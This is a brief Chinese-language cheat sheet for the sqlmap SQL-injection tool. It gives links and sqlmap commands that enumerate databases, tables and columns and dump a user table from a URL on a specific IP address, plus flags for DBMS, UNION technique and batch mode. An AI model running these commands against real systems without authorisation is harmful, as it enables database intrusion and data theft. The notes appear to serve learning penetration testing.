Sqlmap

项目地址

sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool

官方wiki

Usage · sqlmapproject/sqlmap Wiki

参考博文

https://blog.csdn.net/weixin_43819747/article/details/136736688
https://zhuanlan.zhihu.com/p/397917097
https://wiki.wgpsec.org/knowledge/tools/sqlmap.html

使用简记

获取所有数据库库名
python sqlmap.py -u “http://43.139.207.11/inject/my.php?id=1" –dbs

获取表名
python sqlmap.py -u “http://43.139.207.11/inject/my.php?id=1" -D db-test –tables

获取字段名
python sqlmap.py -u “http://43.139.207.11/inject/my.php?id=1" -D db-test -T wp_user –columns

获取数据
python sqlmap.py -u “http://43.139.207.11/inject/my.php?id=1" -D db-test -T wp_user -C admin –dump

指定数据库类型
–dbms MySQL

指定SQL注入类型 为UNION联合型
–technique U

使用batch参数，可以在所有需要用户输入的部分（通常是询问执行yes还是no），执行默认操作，不需要用户再输入
–batch

强制停止
Ctrl+2C